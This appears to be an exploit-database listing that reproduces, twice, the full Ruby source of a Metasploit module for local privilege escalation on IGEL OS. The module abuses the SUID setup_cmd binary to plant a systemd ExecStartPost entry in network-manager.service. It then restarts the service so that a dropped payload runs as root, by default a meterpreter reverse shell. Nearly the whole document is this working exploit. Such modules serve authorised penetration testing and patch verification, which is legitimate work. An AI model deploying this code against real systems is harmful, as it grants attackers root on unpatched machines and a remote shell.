IGEL OS Privilege Escalation (via systemd service)_MSF:EXPLOIT-LINUX-LOCAL-IGEL_NETWORK_PRIV_ESC-

Description

Escalate privileges for IGEL OS Workspace Edition sessions, by modifying network-manager.service using setupcmd SUID and network, then restarting the service. Module Options msf use exploit/linux/local/igelnetworkprivesc msf exploitigelnetworkprivesc...

Visit Original Source

Basic Information

ID MSF:EXPLOIT-LINUX-LOCAL-IGEL_NETWORK_PRIV_ESC-

Published Nov 26, 2025 at 18:53

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
include Msf::Post::Linux
include Msf::Post::Linux::System
include Msf::Post::Unix
include Msf::Post::File
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'IGEL OS Privilege Escalation (via systemd service)',
'Description' => %q{
Escalate privileges for IGEL OS Workspace Edition sessions, by modifying
network-manager.service using setup_cmd (SUID) and network, then restarting
the service.
},
'Author' => 'Zack Didcott',
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'Arch' => [ARCH_X64],
'Targets' => [
[
'Linux x86_64', {
'Arch' => ARCH_X64,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
],
'DefaultTarget' => 0,
'SessionTypes' => ['shell', 'meterpreter'],
'DisclosureDate' => '2024-07-10', # Patch release date
'Notes' => {
'Stability' => [CRASH_SERVICE_RESTARTS],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [CONFIG_CHANGES, SCREEN_EFFECTS]
}
)
)

register_advanced_options([
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
])
end

def check
version = Rex::Version.new(
read_file('/etc/system-release').delete_prefix('IGEL OS').strip
)
unless version < Rex::Version.new('11.10.150')
return CheckCode::Safe("IGEL OS #{version} is not vulnerable")
end

CheckCode::Appears("IGEL OS #{version} should be vulnerable")
end

def exploit
print_status('Uploading payload to target')
payload_file = write_payload(generate_payload_exe, datastore['WritableDir'], 0o700)

print_status('Writing config to target')
config = build_config(payload_file)
config_file = write_payload(config, datastore['WritableDir'], 0o600)

print_status('Applying service config')
vprint_status(modify_service(config_file))

print_status('Restarting service')
vprint_status(restart_service)
end

def write_payload(contents, dir, perm)
fail_with(Failure::NoAccess, "Directory '#{dir}' is not writable") unless writable?(dir)
fail_with(Failure::NoAccess, "Directory '#{dir}' is on a noexec mount point") if noexec?(dir)

filepath = "#{dir}/#{Rex::Text.rand_text_alpha(8)}"

write_file(filepath, contents)
chmod(filepath, perm)

unless file?(filepath)
fail_with(Failure::Unknown, "Failed to write to '#{filepath}'")
end

register_files_for_cleanup(filepath)

return filepath
end

def build_config(payload_file)
config = <<~CONFIG.strip
[Service]
TimeoutStartSec=infinity
ExecStartPost=#{payload_file}
CONFIG
return config
end

def modify_service(config_file)
command = <<~COMMAND.strip
/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")' << EOF
env SYSTEMD_EDITOR="/bin/cp #{config_file}" /config/bin/setup_cmd /config/bin/network edit
EOF
COMMAND

script_file = write_payload(command, datastore['WritableDir'], 0o700)
cmd_exec(script_file)
end

def restart_service
create_process('/config/bin/setup_cmd', args: ['/config/bin/network', 'restart'], time_out: 120)
end
end

{
    "lastseen": "2025-11-26T19:04:38",
    "description": "Escalate privileges for IGEL OS Workspace Edition sessions, by modifying network-manager.service using setupcmd SUID and network, then restarting the service. Module Options msf use exploit/linux/local/igelnetworkprivesc msf exploitigelnetworkprivesc...",
    "published": "2025-11-26T18:53:41",
    "modified": "2025-11-26T18:53:41",
    "type": "metasploit",
    "title": "IGEL OS Privilege Escalation (via systemd service)",
    "source": "",
    "references": "",
    "id": "MSF:EXPLOIT-LINUX-LOCAL-IGEL_NETWORK_PRIV_ESC-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n  include Msf::Post::Linux\n  include Msf::Post::Linux::System\n  include Msf::Post::Unix\n  include Msf::Post::File\n  include Msf::Exploit::FileDropper\n  include Msf::Exploit::EXE\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'IGEL OS Privilege Escalation (via systemd service)',\n        'Description' => %q{\n          Escalate privileges for IGEL OS Workspace Edition sessions, by modifying\n          network-manager.service using setup_cmd (SUID) and network, then restarting\n          the service.\n        },\n        'Author' => 'Zack Didcott',\n        'License' => MSF_LICENSE,\n        'Platform' => ['linux'],\n        'Arch' => [ARCH_X64],\n        'Targets' => [\n          [\n            'Linux x86_64', {\n              'Arch' => ARCH_X64,\n              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }\n            }\n          ],\n        ],\n        'DefaultTarget' => 0,\n        'SessionTypes' => ['shell', 'meterpreter'],\n        'DisclosureDate' => '2024-07-10', # Patch release date\n        'Notes' => {\n          'Stability' => [CRASH_SERVICE_RESTARTS],\n          'Reliability' => [REPEATABLE_SESSION],\n          'SideEffects' => [CONFIG_CHANGES, SCREEN_EFFECTS]\n        }\n      )\n    )\n\n    register_advanced_options([\n      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n    ])\n  end\n\n  def check\n    version = Rex::Version.new(\n      read_file('/etc/system-release').delete_prefix('IGEL OS').strip\n    )\n    unless version < Rex::Version.new('11.10.150')\n      return CheckCode::Safe(\"IGEL OS #{version} is not vulnerable\")\n    end\n\n    CheckCode::Appears(\"IGEL OS #{version} should be vulnerable\")\n  end\n\n  def exploit\n    print_status('Uploading payload to target')\n    payload_file = write_payload(generate_payload_exe, datastore['WritableDir'], 0o700)\n\n    print_status('Writing config to target')\n    config = build_config(payload_file)\n    config_file = write_payload(config, datastore['WritableDir'], 0o600)\n\n    print_status('Applying service config')\n    vprint_status(modify_service(config_file))\n\n    print_status('Restarting service')\n    vprint_status(restart_service)\n  end\n\n  def write_payload(contents, dir, perm)\n    fail_with(Failure::NoAccess, \"Directory '#{dir}' is not writable\") unless writable?(dir)\n    fail_with(Failure::NoAccess, \"Directory '#{dir}' is on a noexec mount point\") if noexec?(dir)\n\n    filepath = \"#{dir}/#{Rex::Text.rand_text_alpha(8)}\"\n\n    write_file(filepath, contents)\n    chmod(filepath, perm)\n\n    unless file?(filepath)\n      fail_with(Failure::Unknown, \"Failed to write to '#{filepath}'\")\n    end\n\n    register_files_for_cleanup(filepath)\n\n    return filepath\n  end\n\n  def build_config(payload_file)\n    config = <<~CONFIG.strip\n      [Service]\n      TimeoutStartSec=infinity\n      ExecStartPost=#{payload_file}\n    CONFIG\n    return config\n  end\n\n  def modify_service(config_file)\n    command = <<~COMMAND.strip\n      /usr/bin/python3 -c 'import pty; pty.spawn(\"/bin/bash\")' << EOF\n      env SYSTEMD_EDITOR=\"/bin/cp #{config_file}\" /config/bin/setup_cmd /config/bin/network edit\n      EOF\n    COMMAND\n\n    script_file = write_payload(command, datastore['WritableDir'], 0o700)\n    cmd_exec(script_file)\n  end\n\n  def restart_service\n    create_process('/config/bin/setup_cmd', args: ['/config/bin/network', 'restart'], time_out: 120)\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/igel_network_priv_esc.rb",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/exploit/linux/local/igel_network_priv_esc/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply